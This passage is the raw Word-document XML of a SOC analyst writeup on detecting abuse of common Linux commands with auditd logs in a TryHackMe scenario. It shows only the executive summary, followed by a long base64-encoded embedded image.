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1.png" ContentType="image/png"/>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3" w:name="content"/>
    <w:bookmarkStart w:id="52" w:name="Xa0c15769b31f3540b0a9d235b7d33c39021bc67"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Linux Threat Detection 2 – SOC Analyst Writeup</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="27" w:name="executive-summary"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This writeup analyzes a TryHackMe scenario and the Medium article</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">“Hunting the Hidden: A SOC Analyst’s Guide to Linux Threat Detection 2”</w:t>
      </w:r>
      <w:hyperlink r:id="rId21">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[1]</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId22">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[2]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. We outline how attackers use benign Linux commands for malicious discovery, and how defenders can detect them. Key techniques include using</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">auditd logs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(e.g.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ausearch</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) and process-tree context to spot suspicious command usage</w:t>
      </w:r>
      <w:hyperlink r:id="rId22">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[2]</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId23">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[3]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. We document common enumeration commands (e.g.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ps aux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">find</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">wget</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) with their normal purpose and why they matter if abused. A comparative table maps each command to typical malicious uses, detection indicators in logs, and recommended defenses. We also illustrate attacker steps versus detection points in mermaid diagrams. Finally, we summarize lessons learned and SOC recommendations for monitoring Linux environments. This comprehensive, technical report is written in a TryHackMe-style format for SOC analysts and reviewers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3557778"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="" id="25" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="data:image/png;base64,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